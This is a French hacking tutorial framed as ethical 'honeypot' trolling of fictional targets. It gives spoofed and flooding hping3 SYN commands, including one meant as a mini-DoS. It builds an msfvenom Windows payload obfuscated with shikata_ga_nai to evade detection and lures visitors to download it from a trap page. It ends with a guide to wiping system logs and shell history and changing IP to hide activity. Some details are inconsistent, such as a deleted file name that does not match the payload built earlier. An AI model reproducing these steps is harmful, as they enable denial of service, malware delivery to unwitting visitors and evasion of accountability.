📖 CINQ MÉTHODES POUR TITILLER ET PIÉGER – ÉTHIQUE ET TECHNIQUE
Ce tuto simule des réponses à des "intrusions" fictives sur notre réseau, notre présence sociale, ou notre ligne téléphonique. On explore cinq scénarios distincts, chacun avec une méthode de titillage (provocation réseau ou autre) et un honeypot (piège web) adapté. L’objectif : attirer l’attention d’un adversaire fictif, le piéger s’il réagit, et lui envoyer un message éducatif sans causer de dégât. On finit en mode fantôme, avec une section détaillée sur l’effacement des traces sous Kali. Tout est pensé pour être clair, technique, et fidèle à notre philosophie Platon-y : brut, malin, et éthique.
SOMMAIRE
- 1. INTRODUCTION
- 2. PRÉPARATION COMMUNE – L’ARSENAL
- 3. CAS 1 – SUBTILITÉ SUR EXAMPLE.COM
- 4. CAS 2 – AGRESSIVITÉ SUR TEST.COM
- 5. CAS 3 – SOURNOISERIE SUR DUMMY.ORG
- 6. CAS 4 – RÉSEAU SOCIAL SUR FAKEBOOK.COM
- 7. CAS 5 – TÉLÉPHONE SUR PHONE.EXAMPLE.NET
- 8. SCÉNARIO GLOBAL – LA CHASSE
- 9. MODE FANTÔME – EFFACER LES TRACES
- 10. CONCLUSION
1️⃣ INTRODUCTION
Ce tuto, c’est pas une balade. On titille des cibles fictives, on tend des pièges subtils, et on laisse une trace éducative pour ceux qui osent nous suivre. Éthique avant tout, mais avec des griffes acérées. Que ce soit un réseau, un réseau social, ou une ligne téléphonique, on répond avec style et puissance. Les curieux tomberont dans nos filets, et les leçons resteront. Prépare-toi – c’est notre terrain de chasse !
⚠️ LÉGAL ONLY : Teste en lab sécurisé avec tes propres machines. Toute action non autorisée, c’est la cage – pas pour nous !
Que la traque commence !
2️⃣ PRÉPARATION COMMUNE – L’ARSENAL
Voici le setup pour dominer :
- Kali Linux : En root (
sudo -i) pour une maîtrise totale. - Outils :
hping3(titillage réseau),python3(honeypots),msfvenometmsfconsole(payloads),curl(requêtes HTTP),sipsak(SIP). - Environnement : Lab isolé (VM ou réseau test, jamais en prod).
INSTALLATION DÉTAILLÉE
sudo apt update && sudo apt install hping3 metasploit-framework python3 curl sipsak
Vérifie : hping3 -v, python3 --version, msfconsole -v.
mkdir /platon-y/UnchainedLab && cd /platon-y/UnchainedLab
Création du lab pour tout organiser.
3️⃣ CAS 1 – SUBTILITÉ SUR EXAMPLE.COM
Cible : example.com (IP fictive : 93.184.216.34).
Style : Titillage discret via HTTPS, honeypot minimaliste avec logs et fingerprinting.
TITILLAGE AVEC HPING3
sudo hping3 -S -p 443 -c 50 -i u2000 --rand-source 93.184.216.34
Détails :
-S : Paquets SYN pour simuler une connexion TCP.
-p 443 : HTTPS, port sécurisé.
-c 50 : 50 paquets, discret pour éviter IDS.
-i u2000 : Intervalle de 2ms, furtif.
--rand-source : Spoofing léger (aléatoire en lab).
Effet : Logué comme scan anodin.
Analyse : tcpdump -i eth0 -n port 443 -w subtle.pcap, puis wireshark subtle.pcap.
HONEYPOT MINIMALISTE
# subtle.py
from http.server import HTTPServer, BaseHTTPRequestHandler
import time
import socket
class SubtleHandler(BaseHTTPRequestHandler):
def do_GET(self):
attacker_ip = self.client_address[0]
attacker_port = self.client_address[1]
headers = self.headers
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Server", "Platon-y/1.0")
self.end_headers()
user_agent = headers.get('User-Agent', 'Inconnu')
host = headers.get('Host', 'Inconnu')
timestamp = time.strftime("%Y-%m-%d %H:%M:%S")
html = f"""
<html>
<body style="background: #1a1a3d; color: #00CED1; font-family: monospace;">
<h1>Platon-y Unchained</h1>
<p>IP détectée : {attacker_ip}:{attacker_port}</p>
<p>User-Agent : {user_agent}</p>
<p>T’as vu mon petit coucou réseau sur 93.184.216.34 ?</p>
<p>Example.com, pourquoi sniffer mon espace ? Sécurise-toi mieux !</p>
<p>Timestamp : {timestamp}</p>
</body>
</html>
"""
self.wfile.write(html.encode())
with open("subtle.log", "a") as log:
log.write(f"[{timestamp}] IP: {attacker_ip}:{attacker_port} | UA: {user_agent} | Host: {host}\n")
print(f"Visiteur subtil : {attacker_ip} | {user_agent}")
port = 8081
server = HTTPServer(("0.0.0.0", port), SubtleHandler)
print("Honeypot subtil actif sur http://0.0.0.0:8081")
server.serve_forever()
Lancement : python3 subtle.py
Détails :
- HTML échappé avec < et > pour affichage brut.
- Variables dynamiques gérées dans la `f-string`.
- Logs dans subtle.log.
Effet : Page discrète qui note et éduque.
Bonus : tail -f subtle.log.
4️⃣ CAS 2 – AGRESSIVITÉ SUR TEST.COM
Cible : test.com (IP fictive : 192.0.2.1).
Style : Flood visuel via HTTP, honeypot chaotique avec simulation DoS.
TITILLAGE AVEC HPING3
sudo hping3 -S -p 80 -c 200 -i u500 --flood 192.0.2.1
Détails :
-p 80 : HTTP, port exposé.
-c 200 : 200 paquets (limite facultative avec --flood).
-i u500 : 0,5ms, rapide.
--flood : Mode agressif, max SYN.
Effet : Sature les logs, simule un mini-DoS.
Analyse : tcpdump -i eth0 -n port 80.
HONEYPOT CHAOTIQUE
# glitch.py
from http.server import HTTPServer, BaseHTTPRequestHandler
import random
import time
class GlitchHandler(BaseHTTPRequestHandler):
def do_GET(self):
attacker_ip = self.client_address[0]
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("X-Platon-y", "Chaos activé")
self.end_headers()
time.sleep(random.uniform(0.5, 2)) # Latence aléatoire
html = f"""
<html>
<body style="background: #0d0d1a; color: #FF4500; font-family: 'Courier New', monospace; text-align: center;">
<h1 style="animation: glitch 0.3s infinite; text-shadow: 0 0 15px #FF4500;">Platon-y Unchained</h1>
<p>IP : {attacker_ip}</p>
<p>Mon burst sur 192.0.2.1 t’a réveillé, hein ?</p>
<p>Test.com, arrêtez de fouiner ou sécurisez mieux vos systèmes !</p>
<script>
alert("Platon-y te secoue – Respectez mon réseau !");
setInterval(() => {{ document.body.style.filter = `hue-rotate(${{Math.random()*360}}deg)`; }}, 100);
setTimeout(() => {{ window.location.reload(); }}, 5000);
</script>
</body>
<style>
@keyframes glitch {{ 0% {{ transform: skew(0); }} 20% {{ transform: skew(5deg); }} 40% {{ transform: skew(-5deg); }} 60% {{ transform: skew(5deg); }} 80% {{ transform: skew(-5deg); }} 100% {{ transform: skew(0); }} }}
</style>
</html>
"""
self.wfile.write(html.encode())
print(f"Visiteur glitché : {attacker_ip}")
port = 8082
server = HTTPServer(("0.0.0.0", port), GlitchHandler)
print("Honeypot chaotique actif sur http://0.0.0.0:8082")
server.serve_forever()
Lancement : python3 glitch.py
Détails :
- HTML échappé pour affichage brut.
- Latence aléatoire + glitch visuel.
Effet : Page agressive qui perturbe.
Bonus : iptables -A INPUT -p tcp --dport 8082 -j LOG.
5️⃣ CAS 3 – SOURNOISERIE SUR DUMMY.ORG
Cible : dummy.org (IP fictive : 198.51.100.1).
Style : Titillage furtif via SSH, honeypot avec payload obfuscé.
TITILLAGE AVEC HPING3
sudo hping3 -S -p 22 -c 75 -i u1500 --spoof 10.0.0.1 198.51.100.1
Détails :
-p 22 : SSH, cible sensible.
-c 75 : 75 paquets, discret.
-i u1500 : 1,5ms, lent pour éviter IDS.
--spoof 10.0.0.1 : Fausse IP (lab only).
Effet : Logué comme tentative suspecte.
Analyse : tcpdump -i eth0 -n port 22.
PAYLOAD METASPLOIT
msfvenom -p windows/exec CMD="msg * Platon-y Unchained : Pourquoi sniffer mon réseau ? Dummy.org, sécurisez vos systèmes !" -f exe -o traque.exe
msfvenom -p windows/exec CMD="msg * Platon-y Unchained : Pourquoi sniffer mon réseau ? Dummy.org, sécurisez vos systèmes !" -f exe -e x86/shikata_ga_nai -i 5 -o traque_obf.exe
python3 -m http.server 8080
Détails :
- Payload simple et obfuscé (Shikata Ga Nai, 5 itérations).
- Serveur sur http://TON_IP:8080/.
Effet : Message éducatif sur Windows.
HONEYPOT SOURNOIS
# sneaky.py
from http.server import HTTPServer, BaseHTTPRequestHandler
import hashlib
class SneakyHandler(BaseHTTPRequestHandler):
def do_GET(self):
attacker_ip = self.client_address[0]
headers = self.headers
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("X-Platon-y", "Piège tendu")
self.end_headers()
user_agent = headers.get('User-Agent', 'Inconnu')
payload_url = "http://TON_IP:8080/traque_obf.exe"
ip_hash = hashlib.sha256(attacker_ip.encode()).hexdigest()[:8]
html = f"""
<html>
<body style="background: #000; color: #39FF14; font-family: 'Courier New', monospace; text-align: center;">
<h1 style="animation: pulse 1s infinite;">Platon-y Unchained</h1>
<p>ID Visiteur : {ip_hash}</p>
<p>User-Agent : {user_agent}</p>
<p>Mon hping3 sur 198.51.100.1 t’a eu ?</p>
<p>Dummy.org, pourquoi mon iptables ? Sécurise-toi !</p>
<p><a href="{payload_url}" style="color: #FF4500;">Un petit cadeau pour vos Windows – clique si t’oses.</a></p>
<script>alert("Platon-y te voit – Respectez mon réseau !");</script>
</body>
<style>
@keyframes pulse {{ 0%, 100% {{ opacity: 1; }} 50% {{ opacity: 0.5; }} }}
</style>
</html>
"""
self.wfile.write(html.encode())
print(f"Visiteur sournois : {attacker_ip} | Hash: {ip_hash}")
port = 8083
server = HTTPServer(("0.0.0.0", port), SneakyHandler)
print("Honeypot sournois actif sur http://0.0.0.0:8083")
server.serve_forever()
Lancement : python3 sneaky.py
Détails :
- HTML échappé.
- Hash IP pour tracking.
- Payload obfuscé.
Effet : Page menaçante avec piège.
Bonus : netstat -tulnp | grep 8083.
6️⃣ CAS 4 – RÉSEAU SOCIAL SUR FAKEBOOK.COM
Cible : fakebook.com (IP fictive : 203.0.113.1).
Style : Titillage via HTTP, honeypot social avec tracking.
TITILLAGE AVEC CURL
curl -A "Platon-y_Unchained - Pourquoi sniffer mon réseau ?" -H "X-Forwarded-For: 10.0.0.2" --connect-timeout 5 http://203.0.113.1
Détails :
-A : User-Agent personnalisé.
-H "X-Forwarded-For" : Spoofing IP (lab only).
--connect-timeout 5 : Timeout rapide.
Effet : Logué comme requête suspecte.
Analyse : curl -I http://203.0.113.1.
HONEYPOT SOCIAL
# social.py
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
import time
class SocialHandler(BaseHTTPRequestHandler):
def do_GET(self):
attacker_ip = self.client_address[0]
headers = self.headers
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
user_agent = headers.get('User-Agent', 'Inconnu')
timestamp = time.strftime("%Y-%m-%d %H:%M:%S")
data = {"ip": attacker_ip, "ua": user_agent, "time": timestamp}
with open("social.json", "a") as log:
log.write(json.dumps(data) + "\n")
html = f"""
<html>
<body style="background: #1c2526; color: #FFD700; font-family: 'Arial', sans-serif; text-align: center;">
<h1 style="font-size: 2em;">Platon-y Unchained</h1>
<p>IP détectée : {attacker_ip}</p>
<p>T’as vu ma requête sur 203.0.113.1 ?</p>
<p>Fakebook.com, arrêtez de fouiner – sécurisez vos profils !</p>
<p style="color: #FF4500;">Message privé : Respectez mon espace.</p>
<script>
alert("Platon-y te follow – Laissez-moi tranquille !");
fetch('https://api.ipify.org?format=json').then(r => r.json()).then(d => console.log('IP réelle:', d.ip));
</script>
</body>
</html>
"""
self.wfile.write(html.encode())
print(f"Visiteur social : {attacker_ip} | {user_agent}")
port = 8084
server = HTTPServer(("0.0.0.0", port), SocialHandler)
print("Honeypot social actif sur http://0.0.0.0:8084")
server.serve_forever()
Lancement : python3 social.py
Détails :
- HTML échappé.
- Logs JSON dans social.json.
- Fetch IP réelle (console).
Effet : Page sociale qui tracke.
Bonus : cat social.json | jq ..
7️⃣ CAS 5 – TÉLÉPHONE SUR PHONE.EXAMPLE.NET
Cible : phone.example.net (IP fictive : 162.168.1.1).
Style : Titillage via SIP, honeypot téléphonique avec audio.
TITILLAGE AVEC SIPSAK
sipsak -s sip:platon-y@162.168.1.1 -v -H "From: <sip:unchained@platon-y.fr>" -m "Platon-y vous appelle"
Détails :
-s : URI SIP fictive.
-v : Verbeux.
-H : Header From personnalisé.
-m : Message SIP.
Effet : Logué comme appel suspect.
Analyse : wireshark -f "sip" -i eth0.
HONEYPOT TÉLÉPHONIQUE
# phone.py
from http.server import HTTPServer, BaseHTTPRequestHandler
import base64
class PhoneHandler(BaseHTTPRequestHandler):
def do_GET(self):
attacker_ip = self.client_address[0]
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
# Audio base64 (exemple court, remplace par un vrai WAV)
audio_b64 = "data:audio/wav;base64,UklGRiQAAABXQVZFZm10IBAAAAABAAEARKwAAIhYAQACABAAZGF0YQAAAAA="
html = f"""
<html>
<body style="background: #0a0f0d; color: #8A2BE2; font-family: 'Courier New', monospace; text-align: center;">
<h1 style="animation: ring 2s infinite;">Platon-y Unchained Calling</h1>
<p>IP : {attacker_ip}</p>
<p>Mon SIP sur 162.168.1.1 t’a sonné ?</p>
<p>Phone.example.net, pourquoi mon réseau ? Sécurisez vos lignes !</p>
<p style="color: #FF4500;">Écoute ça :</p>
<audio controls autoplay>
<source src="{audio_b64}" type="audio/wav">
</audio>
<script>alert("Platon-y te rappelle – Laissez mon espace tranquille !");</script>
</body>
<style>
@keyframes ring {{ 0% {{ transform: rotate(0); }} 10% {{ transform: rotate(5deg); }} 20% {{ transform: rotate(-5deg); }} 30% {{ transform: rotate(5deg); }} 40% {{ transform: rotate(-5deg); }} 100% {{ transform: rotate(0); }} }}
</style>
</html>
"""
self.wfile.write(html.encode())
print(f"Visiteur téléphonique : {attacker_ip}")
port = 8085
server = HTTPServer(("0.0.0.0", port), PhoneHandler)
print("Honeypot téléphonique actif sur http://0.0.0.0:8085")
server.serve_forever()
Lancement : python3 phone.py
Détails :
- HTML échappé.
- Audio Base64 (remplace par base64 file.wav > audio.txt).
Effet : Page violette avec son.
Bonus : curl http://localhost:8085.
8️⃣ SCÉNARIO GLOBAL – LA CHASSE
- Titillage : Exécute les commandes des 5 cas en parallèle.
- Pièges : Lance les honeypots (8081-8085) + serveur (8080).
- Résultat : Les curieux tombent sur les pages ; pour dummy.org, clic sur
traque.exeaffiche un message.
Ouvre 6 terminaux : un par script Python + titillages.
9️⃣ MODE FANTÔME – EFFACER LES TRACES
Disparais comme un loup dans la nuit :
ARRÊTER LES SERVICES
pkill python3 # Tue honeypots et serveur
pkill msfconsole # Si utilisé
Coupe toute activité réseau.
CHANGER D’IP
protonvpn-cli connect # Nouvelle IP via VPN
Alternative : Reboot routeur.
EFFACER LES LOGS SYSTÈME
sudo rm -f /var/log/kern.log /var/log/syslog /var/log/messages
sudo systemctl restart rsyslog
sudo rm -f /var/log/ufw.log # Si pare-feu actif
Supprime traces réseau.
EFFACER L’HISTORIQUE
history -c # Vide mémoire
rm -f ~/.bash_history # Supprime fichier
NETTOYER FICHIERS
rm -f /platon-y/UnchainedLab/*.log
rm -f /platon-y/UnchainedLab/troll.exe
rm -f /platon-y/UnchainedLab/*.py
VIDER MÉMOIRE
sudo sync && sudo sysctl -w vm.drop_caches=3
Vérifie : ls -la /var/log/, whoami; date.
🔟 CONCLUSION
Cinq approches uniques :
- Subtilité : Discret, pour les stratèges.
- Agressivité : Visuel, pour marquer.
- Sournoiserie : Furtif, pour les malins.
- Réseau Social : Moderne, pour les connectés.
- Téléphone : Original, pour les audacieux.
Teste en lab, respecte la loi, disparais comme un nomade. Platon-y Unchained laisse des leçons, pas des traces ! Ou alors s’est voulu 😘.